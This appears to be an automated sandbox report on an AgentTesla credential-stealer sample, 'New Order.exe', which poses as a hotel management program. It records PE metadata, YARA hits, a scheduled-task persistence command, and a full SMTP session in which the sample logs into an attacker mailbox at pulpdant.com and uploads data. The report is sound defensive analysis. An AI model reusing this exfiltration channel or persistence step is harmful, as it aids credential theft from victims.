IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xba158	0xba200	False	0.680431235309	data	7.54927053001	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xbe000	0x10e98	0x11000	False	0.133099724265	data	4.5074360494	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xd0000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0xbe100	0x10828	data
RT_GROUP_ICON	0xce938	0x14	data
RT_VERSION	0xce95c	0x33c	data
RT_MANIFEST	0xceca8	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2017
Assembly Version	1.0.0.0
InternalName	XWRTgP.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	HotelMgmtSystem
ProductVersion	1.0.0.0
FileDescription	HotelMgmtSystem
OriginalFilename	XWRTgP.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/27/21-15:41:27.530383	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49712	587	192.168.2.6	208.91.199.224

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 27, 2021 15:41:25.937750101 CET	49712	587	192.168.2.6	208.91.199.224
Jan 27, 2021 15:41:26.110754013 CET	587	49712	208.91.199.224	192.168.2.6
Jan 27, 2021 15:41:26.110937119 CET	49712	587	192.168.2.6	208.91.199.224
Jan 27, 2021 15:41:26.470077038 CET	587	49712	208.91.199.224	192.168.2.6
Jan 27, 2021 15:41:26.470530987 CET	49712	587	192.168.2.6	208.91.199.224
Jan 27, 2021 15:41:26.646051884 CET	587	49712	208.91.199.224	192.168.2.6
Jan 27, 2021 15:41:26.646081924 CET	587	49712	208.91.199.224	192.168.2.6
Jan 27, 2021 15:41:26.648472071 CET	49712	587	192.168.2.6	208.91.199.224
Jan 27, 2021 15:41:26.822031975 CET	587	49712	208.91.199.224	192.168.2.6
Jan 27, 2021 15:41:26.823117971 CET	49712	587	192.168.2.6	208.91.199.224
Jan 27, 2021 15:41:26.998219013 CET	587	49712	208.91.199.224	192.168.2.6
Jan 27, 2021 15:41:26.999209881 CET	49712	587	192.168.2.6	208.91.199.224
Jan 27, 2021 15:41:27.173307896 CET	587	49712	208.91.199.224	192.168.2.6
Jan 27, 2021 15:41:27.173909903 CET	49712	587	192.168.2.6	208.91.199.224
Jan 27, 2021 15:41:27.355223894 CET	587	49712	208.91.199.224	192.168.2.6
Jan 27, 2021 15:41:27.355609894 CET	49712	587	192.168.2.6	208.91.199.224
Jan 27, 2021 15:41:27.528959990 CET	587	49712	208.91.199.224	192.168.2.6
Jan 27, 2021 15:41:27.530383110 CET	49712	587	192.168.2.6	208.91.199.224
Jan 27, 2021 15:41:27.530602932 CET	49712	587	192.168.2.6	208.91.199.224
Jan 27, 2021 15:41:27.534472942 CET	49712	587	192.168.2.6	208.91.199.224
Jan 27, 2021 15:41:27.534578085 CET	49712	587	192.168.2.6	208.91.199.224
Jan 27, 2021 15:41:27.705373049 CET	587	49712	208.91.199.224	192.168.2.6
Jan 27, 2021 15:41:27.709623098 CET	587	49712	208.91.199.224	192.168.2.6
Jan 27, 2021 15:41:27.807670116 CET	587	49712	208.91.199.224	192.168.2.6
Jan 27, 2021 15:41:27.851052999 CET	49712	587	192.168.2.6	208.91.199.224

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 27, 2021 15:39:27.138477087 CET	58931	53	192.168.2.6	8.8.8.8
Jan 27, 2021 15:39:27.197932959 CET	53	58931	8.8.8.8	192.168.2.6
Jan 27, 2021 15:39:28.445102930 CET	57725	53	192.168.2.6	8.8.8.8
Jan 27, 2021 15:39:28.507457972 CET	53	57725	8.8.8.8	192.168.2.6
Jan 27, 2021 15:39:29.423366070 CET	49283	53	192.168.2.6	8.8.8.8
Jan 27, 2021 15:39:29.471323013 CET	53	49283	8.8.8.8	192.168.2.6
Jan 27, 2021 15:39:30.419294119 CET	58377	53	192.168.2.6	8.8.8.8
Jan 27, 2021 15:39:30.469995022 CET	53	58377	8.8.8.8	192.168.2.6
Jan 27, 2021 15:39:31.702112913 CET	55074	53	192.168.2.6	8.8.8.8
Jan 27, 2021 15:39:31.762833118 CET	53	55074	8.8.8.8	192.168.2.6
Jan 27, 2021 15:39:32.712439060 CET	54513	53	192.168.2.6	8.8.8.8
Jan 27, 2021 15:39:32.760235071 CET	53	54513	8.8.8.8	192.168.2.6
Jan 27, 2021 15:39:34.033950090 CET	62044	53	192.168.2.6	8.8.8.8
Jan 27, 2021 15:39:34.084796906 CET	53	62044	8.8.8.8	192.168.2.6
Jan 27, 2021 15:39:35.238338947 CET	63791	53	192.168.2.6	8.8.8.8
Jan 27, 2021 15:39:35.286547899 CET	53	63791	8.8.8.8	192.168.2.6
Jan 27, 2021 15:39:36.279795885 CET	64267	53	192.168.2.6	8.8.8.8
Jan 27, 2021 15:39:36.327878952 CET	53	64267	8.8.8.8	192.168.2.6
Jan 27, 2021 15:39:37.301007986 CET	49448	53	192.168.2.6	8.8.8.8
Jan 27, 2021 15:39:37.351645947 CET	53	49448	8.8.8.8	192.168.2.6
Jan 27, 2021 15:39:38.282694101 CET	60342	53	192.168.2.6	8.8.8.8
Jan 27, 2021 15:39:38.330748081 CET	53	60342	8.8.8.8	192.168.2.6
Jan 27, 2021 15:39:39.464906931 CET	61346	53	192.168.2.6	8.8.8.8
Jan 27, 2021 15:39:39.512805939 CET	53	61346	8.8.8.8	192.168.2.6
Jan 27, 2021 15:40:16.960711956 CET	51774	53	192.168.2.6	8.8.8.8
Jan 27, 2021 15:40:17.008583069 CET	53	51774	8.8.8.8	192.168.2.6
Jan 27, 2021 15:40:57.783761024 CET	56023	53	192.168.2.6	8.8.8.8
Jan 27, 2021 15:40:57.841753006 CET	53	56023	8.8.8.8	192.168.2.6
Jan 27, 2021 15:41:25.554264069 CET	58384	53	192.168.2.6	8.8.8.8
Jan 27, 2021 15:41:25.744374990 CET	53	58384	8.8.8.8	192.168.2.6
Jan 27, 2021 15:41:25.757422924 CET	60261	53	192.168.2.6	8.8.8.8
Jan 27, 2021 15:41:25.820508957 CET	53	60261	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 27, 2021 15:41:25.554264069 CET	192.168.2.6	8.8.8.8	0x1d95	Standard query (0)	smtp.pulpdant.com	A (IP address)	IN (0x0001)
Jan 27, 2021 15:41:25.757422924 CET	192.168.2.6	8.8.8.8	0x149	Standard query (0)	smtp.pulpdant.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 27, 2021 15:41:25.744374990 CET	8.8.8.8	192.168.2.6	0x1d95	No error (0)	smtp.pulpdant.com	us2.smtp.mailhostbox.com		CNAME (Canonical name)	IN (0x0001)
Jan 27, 2021 15:41:25.744374990 CET	8.8.8.8	192.168.2.6	0x1d95	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)
Jan 27, 2021 15:41:25.744374990 CET	8.8.8.8	192.168.2.6	0x1d95	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)
Jan 27, 2021 15:41:25.744374990 CET	8.8.8.8	192.168.2.6	0x1d95	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)
Jan 27, 2021 15:41:25.744374990 CET	8.8.8.8	192.168.2.6	0x1d95	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)
Jan 27, 2021 15:41:25.820508957 CET	8.8.8.8	192.168.2.6	0x149	No error (0)	smtp.pulpdant.com	us2.smtp.mailhostbox.com		CNAME (Canonical name)	IN (0x0001)
Jan 27, 2021 15:41:25.820508957 CET	8.8.8.8	192.168.2.6	0x149	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)
Jan 27, 2021 15:41:25.820508957 CET	8.8.8.8	192.168.2.6	0x149	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)
Jan 27, 2021 15:41:25.820508957 CET	8.8.8.8	192.168.2.6	0x149	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)
Jan 27, 2021 15:41:25.820508957 CET	8.8.8.8	192.168.2.6	0x149	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 27, 2021 15:41:26.470077038 CET	587	49712	208.91.199.224	192.168.2.6	220 us2.outbound.mailhostbox.com ESMTP Postfix
Jan 27, 2021 15:41:26.470530987 CET	49712	587	192.168.2.6	208.91.199.224	EHLO 724536
Jan 27, 2021 15:41:26.646081924 CET	587	49712	208.91.199.224	192.168.2.6	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN
Jan 27, 2021 15:41:26.648472071 CET	49712	587	192.168.2.6	208.91.199.224	AUTH login d29uZGVyQHB1bHBkYW50LmNvbQ==
Jan 27, 2021 15:41:26.822031975 CET	587	49712	208.91.199.224	192.168.2.6	334 UGFzc3dvcmQ6
Jan 27, 2021 15:41:26.998219013 CET	587	49712	208.91.199.224	192.168.2.6	235 2.7.0 Authentication successful
Jan 27, 2021 15:41:26.999209881 CET	49712	587	192.168.2.6	208.91.199.224	MAIL FROM:<wonder@pulpdant.com>
Jan 27, 2021 15:41:27.173307896 CET	587	49712	208.91.199.224	192.168.2.6	250 2.1.0 Ok
Jan 27, 2021 15:41:27.173909903 CET	49712	587	192.168.2.6	208.91.199.224	RCPT TO:<wonder@pulpdant.com>
Jan 27, 2021 15:41:27.355223894 CET	587	49712	208.91.199.224	192.168.2.6	250 2.1.5 Ok
Jan 27, 2021 15:41:27.355609894 CET	49712	587	192.168.2.6	208.91.199.224	DATA
Jan 27, 2021 15:41:27.528959990 CET	587	49712	208.91.199.224	192.168.2.6	354 End data with <CR><LF>.<CR><LF>
Jan 27, 2021 15:41:27.534578085 CET	49712	587	192.168.2.6	208.91.199.224	.
Jan 27, 2021 15:41:27.807670116 CET	587	49712	208.91.199.224	192.168.2.6	250 2.0.0 Ok: queued as 43E74D7BAE

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: New Order.exe PID: 5976 Parent PID: 5704

General

Start time:	15:39:32
Start date:	27/01/2021
Path:	C:\Users\user\Desktop\New Order.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\New Order.exe'
Imagebase:	0xf30000
File size:	833024 bytes
MD5 hash:	3462AFCBDB0969B7F24B42F0E42C7988
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.365195256.0000000003361000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.365875763.00000000042E9000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 6120 Parent PID: 5976

General

Start time:	15:39:42
Start date:	27/01/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\veTETlsQyxlWT' /XML 'C:\Users\user\AppData\Local\Temp\tmpC36D.tmp'
Imagebase:	0x960000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6116 Parent PID: 6120

General

Start time:	15:39:42
Start date:	27/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: New Order.exe PID: 4652 Parent PID: 5976

General

Start time:	15:39:43
Start date:	27/01/2021
Path:	C:\Users\user\Desktop\New Order.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0xcb0000
File size:	833024 bytes
MD5 hash:	3462AFCBDB0969B7F24B42F0E42C7988
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.690207756.0000000003081000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.690207756.0000000003081000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.687646589.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: New Order.exe PID: 5976 Parent PID: 5704 New Order.exeCOMMON

Executed Functions

Function 07F448E2, Relevance: .5, Instructions: 474COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bda75ebf6d376130ad29b88e5aa03baf43ca814a940ba4edf6d05732509a96bf
Instruction ID: 03331ddbc994ac0a237a63c33a67ba82b98ea128b1ffcddecff659c9a8ffb681
Opcode Fuzzy Hash: bda75ebf6d376130ad29b88e5aa03baf43ca814a940ba4edf6d05732509a96bf
Instruction Fuzzy Hash: 6622D0B4915268CFDB64CFA4C848BECBBB1BF4A314F1481A9D549AB361DB709E85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 07F47228, Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73346624ffe648b4460aed450e810da67bfd38529fc1ddff5ce7b28b88119109
Instruction ID: d9cb5c2640ab1a1eba678862785092c8cd28bf75cc93c80ffdf7134cb787a89f
Opcode Fuzzy Hash: 73346624ffe648b4460aed450e810da67bfd38529fc1ddff5ce7b28b88119109
Instruction Fuzzy Hash: 31B1E5B5D1420ACBDB14DF99C480AEDFBB6FF89300F289519E809BB255D7309A45CF60

Uniqueness

Uniqueness Score: -1.00%

Function 07F4341A, Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 658c64bb46ec62a5aa2c5b5af36a939eeec54db4db1ec74e3e32ed80486091a1
Instruction ID: b80c588cf45cb7bf80ad441e534384c46869dd27373a50bc7326a1aeca757037
Opcode Fuzzy Hash: 658c64bb46ec62a5aa2c5b5af36a939eeec54db4db1ec74e3e32ed80486091a1
Instruction Fuzzy Hash: C12130B2D196548BE708CF6BD8416EDBEF3EFC9200F08C07AE518A6264DB344646CB51

Uniqueness

Uniqueness Score: -1.00%

Function 07F43428, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93e9700d43ef3a09dd7a50a6823c32e137c6492f9362ba3b1e9166440b98b771
Instruction ID: 34399d483d64cadd6b7111094c872eba20d887ed8f339ede2305038738dc186a
Opcode Fuzzy Hash: 93e9700d43ef3a09dd7a50a6823c32e137c6492f9362ba3b1e9166440b98b771
Instruction Fuzzy Hash: 0D11F8B1D156098BEB48CFABD9056DEBEF7AFC9300F08C07AE908A6254DB3406468F51

Uniqueness

Uniqueness Score: -1.00%

Function 07F460FB, Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cdb43aefe6acadb6929fb12abb184c2438c67966b3428856ef49602b216b3b1
Instruction ID: f1892ac88623d86ab89d1cbf0683fd991aa587a426a0f4b82714f0248d030e6a
Opcode Fuzzy Hash: 5cdb43aefe6acadb6929fb12abb184c2438c67966b3428856ef49602b216b3b1
Instruction Fuzzy Hash: C4C13AB490020ACFDB10CF89E588A9DFBFAFB46359F1D8554D9059B252C779E888CF60

Uniqueness

Uniqueness Score: -1.00%

Function 07F46150, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3dd9399348bd3e2defa62f1314bf50cd1e221c4b50a6deb3ced8f46964531a2
Instruction ID: fa9d71ce4f45307bbcb259dee17ce4e2b97bc898f082ee01848e5f96748cbdd1
Opcode Fuzzy Hash: a3dd9399348bd3e2defa62f1314bf50cd1e221c4b50a6deb3ced8f46964531a2
Instruction Fuzzy Hash: 0FC149B490020ACFDB10CF89E488A9DFBFAFB46359F1D8554D9059B252C778E889CF60

Uniqueness

Uniqueness Score: -1.00%

Function 07F46160, Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29c012db6d7d9ee66ecf98048e0f8178cb79e60bb8ecbc3e7240259e85655b56
Instruction ID: dd67514a93511d611321a3b54350e861df872f88b44f0d8fba87b9e73088ddfb
Opcode Fuzzy Hash: 29c012db6d7d9ee66ecf98048e0f8178cb79e60bb8ecbc3e7240259e85655b56
Instruction Fuzzy Hash: 16C138B490020ACFDB10CF89E488A9DFBF6FB46369F5D8554D9059B252C779E888CF60

Uniqueness

Uniqueness Score: -1.00%

Function 07F4617F, Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f700e56feafa66269c726838ac9e1a3f2a506083f04df12eff28d7cd52ade4cf
Instruction ID: 721a5fb1342c1a69c3f82e4631ec54471352b3c112a0e630a7da8360ff9c6076
Opcode Fuzzy Hash: f700e56feafa66269c726838ac9e1a3f2a506083f04df12eff28d7cd52ade4cf
Instruction Fuzzy Hash: ABC138B490020ACFDB10CF89E488A9DFBF6FB46369F5D8554D9059B252C779E888CF60

Uniqueness

Uniqueness Score: -1.00%

Function 07F4764C, Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 589bf27a11c13640fe4de80ee35533bc49d2123d3f4b0b505635c4c12bd102a1
Instruction ID: af6cafe7bed01315f111844e61a10dede2828b3d0bd60d269bd8555c252b03da
Opcode Fuzzy Hash: 589bf27a11c13640fe4de80ee35533bc49d2123d3f4b0b505635c4c12bd102a1
Instruction Fuzzy Hash: A6A129B5E14209CFCB14DFA9C8809ADBBB6BF89310F289559E405EB355D734EA42CF60

Uniqueness

Uniqueness Score: -1.00%

Function 07F47218, Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 413e5226c59cfdd6c67837169263dab09e076e4c35f046c9e7e2a7380a86159c
Instruction ID: 457659cb397613fde2152a0a4b06775b512baacd5ab95c94ba8c5aeb52c0c783
Opcode Fuzzy Hash: 413e5226c59cfdd6c67837169263dab09e076e4c35f046c9e7e2a7380a86159c
Instruction Fuzzy Hash: CE91F6B5D18209CFDB14DFA9C4846EDFBF6EF89300F28942AE419AB255D7309A45CF60

Uniqueness

Uniqueness Score: -1.00%

Function 07F40DD6, Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eec372d2b222692cbe82b635b580364075c7cd181d9a51de7300bf3b0cb2d365
Instruction ID: cb33842610eee2e6470ddfe13fbf44c2b0fca7c28e08b779f1db71489969c5e0
Opcode Fuzzy Hash: eec372d2b222692cbe82b635b580364075c7cd181d9a51de7300bf3b0cb2d365
Instruction Fuzzy Hash: BE91D5B1E08289DFCB01CBA8C8456ADBFB1FF45304F28C06AE5159F291EB71D985CB51

Uniqueness

Uniqueness Score: -1.00%

Function 07F476B0, Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ca50a6530c45d1c89f7c985d4a6fc4145dcb31c9cc6880ac64f8304679b542d
Instruction ID: 340de2a28e7304a53366fe31262338753219fd3a7775e68539a0db1f2a33566a
Opcode Fuzzy Hash: 3ca50a6530c45d1c89f7c985d4a6fc4145dcb31c9cc6880ac64f8304679b542d
Instruction Fuzzy Hash: EC710BB9A18218CFCB14DFA9C8408EDBBB5FF4A310B249659E819EB351D735D942CF60

Uniqueness

Uniqueness Score: -1.00%

Function 07F40448, Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90ab7fa822c579c34b1909a95846ef567e3dfa7b3156ef9f18af8cc2ef1b9762
Instruction ID: eb816129578d2a5eadab41e2efea55d53adb16228e44d259f13b1f9018ed6564
Opcode Fuzzy Hash: 90ab7fa822c579c34b1909a95846ef567e3dfa7b3156ef9f18af8cc2ef1b9762
Instruction Fuzzy Hash: AA612A75A00619DFCB14DFA9C894A9DBBF1FF88314F148199E909AB360DB71ED85CB40

Uniqueness

Uniqueness Score: -1.00%

Function 07F45EA8, Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd34cd395073e733ac0c5aa775716d410723a500cf1352e9b414a29ddb6d5bb9
Instruction ID: bd3febccd660871afea0701b0515344e614dd694d6854e9bf90216001267f679
Opcode Fuzzy Hash: dd34cd395073e733ac0c5aa775716d410723a500cf1352e9b414a29ddb6d5bb9
Instruction Fuzzy Hash: ED6181B5E012099FDB08CF99E58499EFBF1FF88310F15816AE824A7365D730E945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 07F45790, Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 427e5687928607beaba3059c0e781d5eb14f28c0532d53316ce6aafba1f34576
Instruction ID: 5d2620d9a9661592877477b6daa1bb44ff015755bd2b1ae7be0332cd34638c67
Opcode Fuzzy Hash: 427e5687928607beaba3059c0e781d5eb14f28c0532d53316ce6aafba1f34576
Instruction Fuzzy Hash: E65135B5D1921DDFDB00EF99C8447EDBFB5BB4A325F18902AE405A3240CB748AA9CF50

Uniqueness

Uniqueness Score: -1.00%

Function 07F40427, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9cf8a8289ae793ad9408461f33dbfbc5e1033dfcd5ecb599c75888163827f75
Instruction ID: 62997c35649275aafac834efe3bd187ebb7b2a90f301207add88b019283aa333
Opcode Fuzzy Hash: d9cf8a8289ae793ad9408461f33dbfbc5e1033dfcd5ecb599c75888163827f75
Instruction Fuzzy Hash: D2612871A00619DFCB14DFA9C894A9DBBF1FF88314F1581A9E509AB360DB70ED85CB40

Uniqueness

Uniqueness Score: -1.00%

Function 07F42808, Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f62ed50aef0510f163430ec939aaef9213af73944cecb35fee6fae8ac5b6971
Instruction ID: 86f97cc073727c7fe8157c456f343e902974ed55ca5b9cbc55d3432456f3f2c7
Opcode Fuzzy Hash: 5f62ed50aef0510f163430ec939aaef9213af73944cecb35fee6fae8ac5b6971
Instruction Fuzzy Hash: 6451C371F14208DFDB149BA9D4557AEBAA2BB89324F184436F906EF380DE70CC81C752

Uniqueness

Uniqueness Score: -1.00%

Function 07F420F2, Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d44dc07c18e536f2a28997645b669fe22afcd2bd3f8013941c37c8ab707b9f08
Instruction ID: 0107673ac1876dfad6acff7ac587ef3c76c0094c99b0574f7f25b3e2f07c0ba8
Opcode Fuzzy Hash: d44dc07c18e536f2a28997645b669fe22afcd2bd3f8013941c37c8ab707b9f08
Instruction Fuzzy Hash: 175189B1A142099FDB00CB98D884ABDBBF2FF88315F188136F955AB291C734DD81CB61

Uniqueness

Uniqueness Score: -1.00%

Function 07F48C80, Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b86d0c6351c49b32a84e4bfcf8689523e26996a689c125f67433e94882d0d87b
Instruction ID: b779e1c8a2ef4702a79aaf51ee33c93cc21c7a72e3fbb5e6b08ffab92e4e367b
Opcode Fuzzy Hash: b86d0c6351c49b32a84e4bfcf8689523e26996a689c125f67433e94882d0d87b
Instruction Fuzzy Hash: BF513BB5E01209DFDB04CFA9D8415EEBBB2BF89300F14852AD415EB754DB399946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 07F48C90, Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6f506f8e6199966e11ffbbe4cbc99c5fd6672410af57ff9648684ec273a5ed8
Instruction ID: 45dd8efcd06f2f6ac0a9e58bea58dccf2423d1bfdc72545fc06db2b557f3b67a
Opcode Fuzzy Hash: f6f506f8e6199966e11ffbbe4cbc99c5fd6672410af57ff9648684ec273a5ed8
Instruction Fuzzy Hash: D05149B5E01209DFDF08CFA9D8419EEBBB2BF88300F248529E415AB754DB35A946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 07F47070, Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7e319e3976d148378a0b29e22e7ba9ac45664db8c2f56e66d4df4691f7f26dc
Instruction ID: 8ce7949f98dfd1a3dd967a29ee042994171a1a71893513ba5b883f323479df2d
